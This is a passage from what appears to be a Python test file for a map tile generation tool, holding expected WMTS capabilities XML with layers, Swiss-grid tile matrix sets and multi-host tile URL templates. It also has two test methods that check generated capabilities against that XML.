<Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_hash/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash_no_meta</ows:Title>\n <ows:Identifier>point_hash_no_meta</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_hash_no_meta/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_px_buffer</ows:Title>\n <ows:Identifier>point_px_buffer</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_px_buffer/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon</ows:Title>\n <ows:Identifier>polygon</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon2</ows:Title>\n <ows:Identifier>polygon2</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/polygon2/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_01</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid_01</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>3571.4285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>1875</MatrixWidth>\n <MatrixHeight>1250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_2</ows:Identifier>\n <ScaleDenominator>714.28571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>9375</MatrixWidth>\n <MatrixHeight>6250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_1</ows:Identifier>\n <ScaleDenominator>357.14285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>18750</MatrixWidth>\n <MatrixHeight>12500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_025</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0_25</ows:Identifier>\n <ScaleDenominator>892.85714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>7500</MatrixWidth>\n <MatrixHeight>5000</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_2_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>2_5</ows:Identifier>\n <ScaleDenominator>8928.5714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>750</MatrixWidth>\n <MatrixHeight>500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>178571.42857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>38</MatrixWidth>\n <MatrixHeight>25</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>2</ows:Identifier>\n <ScaleDenominator>71428.571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>94</MatrixWidth>\n <MatrixHeight>63</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>3</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>4</ows:Identifier>\n <ScaleDenominator>17857.142857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>375</MatrixWidth>\n <MatrixHeight>250</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n</Capabilities>\"\"\",\n True,\n )\n\n MULTIHOST_CAPABILITIES = (\n r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n<Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:ServiceIdentification>\n <ows:Title>Some title</ows:Title>\n <ows:Abstract>Some abstract</ows:Abstract>\n <ows:Keywords>\n <ows:Keyword>some</ows:Keyword>\n <ows:Keyword>keywords</ows:Keyword>\n </ows:Keywords>\n <ows:ServiceType>OGC WMTS</ows:ServiceType>\n <ows:ServiceTypeVersion>1.0.0</ows:ServiceTypeVersion>\n <ows:Fees>None</ows:Fees>\n <ows:AccessConstraint>None</ows:AccessConstraint>\n </ows:ServiceIdentification>\n <ows:ServiceProvider>\n <ows:ProviderName>The provider name</ows:ProviderName>\n <ows:ProviderSite>The provider URL</ows:ProviderSite>\n <ows:ServiceContact>\n <ows:IndividualName>The contact name</ows:IndividualName>\n <ows:PositionName>The position name</ows:PositionName>\n <ows:ContactInfo>\n <ows:Phone>\n <ows:Voice>\\+41 11 222 33 44</ows:Voice>\n <ows:Facsimile>\\+41 11 222 33 44</ows:Facsimile>\n </ows:Phone>\n <ows:Address>\n <ows:DeliveryPoint>Address delivery</ows:DeliveryPoint>\n <ows:City>Berne</ows:City>\n <ows:AdministrativeArea>BE</ows:AdministrativeArea>\n <ows:PostalCode>3000</ows:PostalCode>\n <ows:Country>Switzerland</ows:Country>\n <ows:ElectronicMailAddress>[email protected]</ows:ElectronicMailAddress>\n </ows:Address>\n </ows:ContactInfo>\n </ows:ServiceContact>\n </ows:ServiceProvider>\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n <ows:Get xlink:href=\"http://wmts2/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n <ows:Get xlink:href=\"http://wmts3/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>all</ows:Title>\n <ows:Identifier>all</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/all/default/\"\"\"\n r\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/all/default/\"\"\"\n r\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/all/default/\"\"\"\n r\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>line</ows:Title>\n <ows:Identifier>line</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/line/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/line/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/line/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik</ows:Title>\n <ows:Identifier>mapnik</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/mapnik/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/mapnik/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid</ows:Title>\n <ows:Identifier>mapnik_grid</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik_grid/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/mapnik_grid/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/mapnik_grid/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid_drop</ows:Title>\n <ows:Identifier>mapnik_grid_drop</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik_grid_drop/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/mapnik_grid_drop/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/mapnik_grid_drop/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point</ows:Title>\n <ows:Identifier>point</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash</ows:Title>\n <ows:Identifier>point_hash</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_hash/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/point_hash/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/point_hash/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash_no_meta</ows:Title>\n <ows:Identifier>point_hash_no_meta</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_hash_no_meta/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/point_hash_no_meta/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/point_hash_no_meta/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_px_buffer</ows:Title>\n <ows:Identifier>point_px_buffer</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_px_buffer/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/point_px_buffer/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/point_px_buffer/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon</ows:Title>\n <ows:Identifier>polygon</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon2</ows:Title>\n <ows:Identifier>polygon2</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/polygon2/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/polygon2/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/polygon2/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_01</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid_01</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>3571.4285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>1875</MatrixWidth>\n <MatrixHeight>1250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_2</ows:Identifier>\n <ScaleDenominator>714.28571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>9375</MatrixWidth>\n <MatrixHeight>6250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_1</ows:Identifier>\n <ScaleDenominator>357.14285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>18750</MatrixWidth>\n <MatrixHeight>12500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_025</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0_25</ows:Identifier>\n <ScaleDenominator>892.85714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>7500</MatrixWidth>\n <MatrixHeight>5000</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_2_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>2_5</ows:Identifier>\n <ScaleDenominator>8928.5714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>750</MatrixWidth>\n <MatrixHeight>500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>178571.42857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>38</MatrixWidth>\n <MatrixHeight>25</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>2</ows:Identifier>\n <ScaleDenominator>71428.571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>94</MatrixWidth>\n <MatrixHeight>63</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>3</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>4</ows:Identifier>\n <ScaleDenominator>17857.142857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>375</MatrixWidth>\n <MatrixHeight>250</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n</Capabilities>\"\"\"\n )\n\n def test_multi_host_capabilities(self) -> None:\n gene = TileGeneration(\"tilegeneration/test-fix.yaml\", configure_logging=False)\n self.assert_result_equals(\n controller.get_wmts_capabilities(gene, \"multi_host\"), self.MULTIHOST_CAPABILITIES, True\n )\n\n def test_capabilities_slash(self) -> None:\n gene = TileGeneration(\"tilegeneration/test-capabilities.yaml\", configure_logging=False)\n config = gene.get_config(\"tilegeneration/test-capabilities.yaml\")\n self.assert_result_equals(\n controller.get_wmts_capabilities(gene, config.config[\"generation\"][\"default_cache\"]),\n r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n<Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n 